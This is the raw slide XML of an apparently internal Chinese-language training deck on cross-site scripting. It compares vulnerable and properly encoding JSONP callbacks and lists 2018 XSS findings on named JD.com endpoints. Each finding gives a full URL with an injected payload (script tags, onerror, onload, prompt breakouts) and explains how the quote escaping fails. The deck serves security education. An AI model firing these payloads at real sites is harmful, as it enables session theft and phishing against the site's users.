              <a:rPr lang="zh-CN" altLang="en-US" sz="13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的都能扫出来</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="132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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986530" y="4571365"/>
            <a:ext cx="4131945" cy="694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endParaRPr lang="zh-CN" sz="132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 defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1325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WVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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无法发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="132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8" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986530" y="3060700"/>
            <a:ext cx="4131945" cy="11842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endParaRPr lang="en-US" altLang="zh-CN" sz="1325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 defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1325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WVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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无法发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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可用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1325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portal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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中的存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1325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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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http://utest.pp.jd.com/scan/index.jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="132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475" y="4208780"/>
            <a:ext cx="3115310" cy="192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34" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="38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504190" y="503555"/>
            <a:ext cx="691007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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有漏洞案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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9240" y="1813560"/>
            <a:ext cx="5080000" cy="152971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、请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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http://wq.jd.com/deal/trademisc/getregioninfobylnglat?lng=113.3926&amp;lat=22.51595&amp;g_login_type=0&amp;callback=</a:t>
            </a:r>
            <a:r>
              <a:rPr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jsonpCBKC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&amp;g_tk=878120023&amp;g_ty=ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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返回如右图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269240" y="3992880"/>
            <a:ext cx="5080000" cy="17697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、把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callback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参数后面加上</a:t>
            </a:r>
            <a:r>
              <a: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&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr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https://wq.jd.com/deal/trademisc/getregioninfobylnglat?lng=113.3926&amp;lat=22.51595&amp;g_login_type=0&amp;callback=</a:t>
            </a:r>
            <a:r>
              <a:rPr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jsonpCBKC&lt;script&gt;alert('XSS')&lt;/script&gt;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&amp;g_tk=878120023&amp;g_ty=ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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返回结果没有处理非法字符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795" y="4423410"/>
            <a:ext cx="5346065" cy="11963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720" y="2165350"/>
            <a:ext cx="5311140" cy="1089025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5475605" y="2350135"/>
            <a:ext cx="504190" cy="288290"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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5420995" y="4597400"/>
            <a:ext cx="504190" cy="288290"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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allAtOnce" bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="0" uiExpand="1" build="allAtOnce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504190" y="503555"/>
            <a:ext cx="691007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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正常案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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9240" y="1239520"/>
            <a:ext cx="5080000" cy="152971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、请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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https://wq.jd.com/activeapi/queryjdcouponlistwithfinance?state=3&amp;wxadd=1&amp;sceneval=&amp;_=1542538915234&amp;g_login_type=0&amp;callback=</a:t>
            </a:r>
            <a:r>
              <a:rPr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queryjdcouponcb3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&amp;g_tk=500794095&amp;g_ty=ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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返回如右图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965" y="1052195"/>
            <a:ext cx="4895215" cy="1660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610" y="3849370"/>
            <a:ext cx="5892800" cy="15754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69240" y="3634105"/>
            <a:ext cx="5080000" cy="20097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、把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callback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参数后面加上</a:t>
            </a:r>
            <a:r>
              <a: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&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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https://wq.jd.com/activeapi/queryjdcouponlistwithfinance?state=3&amp;wxadd=1&amp;sceneval=&amp;_=1542538915234&amp;g_login_type=0&amp;callback=</a:t>
            </a:r>
            <a:r>
              <a:rPr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queryjdcouponcb3&lt;script&gt;alert('XSS')&lt;/script&gt;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&amp;g_tk=500794095&amp;g_ty=ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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返回结果对非法字符进行了编码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="右箭头 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5438775" y="1737995"/>
            <a:ext cx="504190" cy="288290"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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4939665" y="4992370"/>
            <a:ext cx="504190" cy="288290"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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allAtOnce" bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="0" uiExpand="1" build="allAtOnce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651510" y="1436370"/>
            <a:ext cx="5055870" cy="3489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wqsou.jd.com中area_ids参数存在反射型XSS漏洞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https://wqsou.jd.com/search/searchn?area_ids=1,72,4137</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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"-prompt(1)- "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x&amp;as=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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&amp;fdesc=全部分类+/+北京&amp;filt_type=catid,L3983M3983&amp;key=女装&amp;projectId=1637&amp;qp_disable=no&amp;t1=1517496221494</a:t>
            </a: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文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="691007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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年部门案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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420" y="2797175"/>
            <a:ext cx="2915920" cy="176720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955030" y="1436370"/>
            <a:ext cx="5078730" cy="3411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返回页面：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第一个双引号把前面的字符串闭合了，第二个双引号把后面的字符串闭合了，前后双引号都已经完整了，剩下中间的语句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略……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&lt;script type="text/javascript"&gt;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略……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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sfpageinit({"retcode":"0","data":{"searchm":{"Head":{"Query":{"HcCid1s":"1315;1318;","HcCid2s":"1343;12102;","HcCid3s":"9719;3983;1356;9710;9706;1355;9712;1354;9708;9705;9713;9721;11985;9722;9720;9717;9715;9767;9711;11988;11986;9718;","UiTag":"0","longType":"1","isWordSearch":"false","requerySearch":"0","WordSearchInfo":{"showWordOne":"","showWordOther":""},"QueryProcessor":{"ExpressionKey":"","ExpandQueryStatus":"","ExpandQuery":"","IsSpecialStock":"0","ShowHiddenInfo":"0"},"Sort":{"ACT":"","UPF":"0"},"FiltType":[{"condition":"L12650M12650","name":"not_cid1"},{"condition":"l3983m3983","name":"catid"},{"condition":</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100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"1,72,4137"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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-prompt(1)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100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"x,0"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,"name":"locationid"}]},</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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略……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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&lt;/script&gt;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0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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="92592" y="1085733"/>
            <a:ext cx="4813299" cy="847935"/>
            <a:chOff x="1016148" y="3007038"/>
            <a:chExt cx="4243840" cy="747730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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0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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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6" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3007038"/>
              <a:ext cx="3723159" cy="557719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m.jd.com 反射型XSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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0" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5972151" y="1085568"/>
            <a:ext cx="4943475" cy="776093"/>
            <a:chOff x="1016148" y="3070390"/>
            <a:chExt cx="4358615" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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000" dirty="0" err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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536830" y="3070390"/>
              <a:ext cx="3837933" cy="557719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ware/view.action sid参数存在XSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="92592" y="3023261"/>
            <a:ext cx="5565140" cy="704338"/>
            <a:chOff x="1016148" y="3133665"/>
            <a:chExt cx="4906731" cy="621103"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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000" dirty="0" err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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536830" y="3133665"/>
              <a:ext cx="4386049" cy="557719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m.jd.com/share/myGene.action geneIds字段存在XSS漏洞 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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just">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr sz="12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6" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5972151" y="2870607"/>
            <a:ext cx="4191439" cy="776093"/>
            <a:chOff x="1016148" y="3196940"/>
            <a:chExt cx="3695552" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148" y="329597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4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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8" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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fd.3.cn反射型XSS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593090" y="1585595"/>
            <a:ext cx="537908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https://m.jd.com/sale/mall/L8NkyPfbYdM.html?cartFlag=1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'-alert(1)-'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr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漏洞详情 </a:t>
            </a:r>
            <a:endParaRPr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cartFlag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回显在script代码单引号中</a:t>
            </a:r>
            <a:r>
              <a:rPr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，未过滤单引号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482080" y="1585595"/>
            <a:ext cx="471868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http://item.m.jd.com/ware/view.action?babelchannel=356440&amp;clickurl=&amp;lat=40.852811&amp;lng=111.665664&amp;sid=0573cbd07f7326a8c3ff7f3b0367e1cw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 onmouseover=prompt(930864) bad="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&amp;un_area=5_258_41500_41902&amp;wareid=11771549879 </a:t>
            </a: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3090" y="3359785"/>
            <a:ext cx="5176520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https://m.jd.com/share/myGene.action?from=singlemessage&amp;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geneIds=alert(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr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amp;headImg=https%3A%2F%2Fm.360buyimg.com%2Fmobilecms%2Fs213x213_jfs%2Ft1603%2F244%2F83996262%2F6654%2Ffbee9beb%2F5555c980N4508a431.png%21q70.jpg&amp;pin=Ym96aG91OTczNTU2Mzcx&amp;sex=2&amp;sourcetype=mystreetshare&amp;utm_campaign=t_335139774&amp;utm_medium=appshare&amp;utm_source=androidapp&amp;utm_term=Wxfriends</a:t>
            </a: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漏洞详情 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geneIds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回显在script代码引号外，可直接构造javascript代码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，可导致窃取cookie、钓鱼等危害。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82080" y="3288030"/>
            <a:ext cx="481139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https://fd.3.cn/cesu/r?pid=787&amp;os=other&amp;apn=unknown&amp;wq_area=2_2830_0|3&amp;_=1.5445209956482442&amp;s1=24&amp;s2=198&amp;s3=157&amp;s4=381&amp;ext=1280,8002&amp;callback=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xxx&lt;img src=x onerror=alert('xss')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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504190" y="503555"/>
            <a:ext cx="691007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CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5955641" y="4647972"/>
            <a:ext cx="5245734" cy="776093"/>
            <a:chOff x="1016148" y="3196940"/>
            <a:chExt cx="4625114" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148" y="329597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000" dirty="0" err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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536830" y="3196940"/>
              <a:ext cx="4104432" cy="557719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wq.jd.com/mcoss/keyword/keywordsearch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN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反射型</a:t>
              </a:r>
              <a:r>
                <a:rPr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XSS漏洞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6465570" y="5137150"/>
            <a:ext cx="481139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https://wq.jd.com/mcoss/keyword/keywordsearch?cgid1=10,15,50&amp;cgid2=56,15&amp;cgid3=112,17&amp;options=1&amp;pc=20&amp;pi=1&amp;ptag=1.1.1.1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&lt;svg/onload=alert(1)&gt;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&amp;ruleid=1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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="92592" y="1013978"/>
            <a:ext cx="4813299" cy="847935"/>
            <a:chOff x="1016148" y="3007038"/>
            <a:chExt cx="4243840" cy="747730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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0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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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6" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3007038"/>
              <a:ext cx="3723159" cy="557719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京东商城手机主站</a:t>
              </a:r>
              <a:r>
                <a:rPr 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搜索处</a:t>
              </a:r>
              <a:r>
                <a:rPr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XSS漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5972151" y="3740503"/>
            <a:ext cx="4943475" cy="776093"/>
            <a:chOff x="1016148" y="3070390"/>
            <a:chExt cx="4358615" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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000" dirty="0" err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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536830" y="3070390"/>
              <a:ext cx="3837933" cy="557719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dom型XSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5976620" y="1157605"/>
            <a:ext cx="5367655" cy="704215"/>
            <a:chOff x="1016148" y="3133665"/>
            <a:chExt cx="4906731" cy="621103"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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000" dirty="0" err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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536830" y="3133665"/>
              <a:ext cx="4386049" cy="557719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内容原创平台，发布咨询编辑框存在dom型XSS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593090" y="1513840"/>
            <a:ext cx="5379085" cy="2707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https://so.m.jd.com/ware/search.action?as=0&amp;keyword=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"&gt;&lt;img src=1 onerror=alert(/xss/)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr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&amp;searchFrom=search&amp;sf=15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页面代码中</a:t>
            </a:r>
            <a:r>
              <a:rPr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content</a:t>
            </a:r>
            <a:r>
              <a:rPr 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被双引号闭合，</a:t>
            </a:r>
            <a:r>
              <a:rPr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meta</a:t>
            </a:r>
            <a:r>
              <a:rPr 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标签被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&gt;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闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr 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&lt;meta name="keywords" content="</a:t>
            </a:r>
            <a:r>
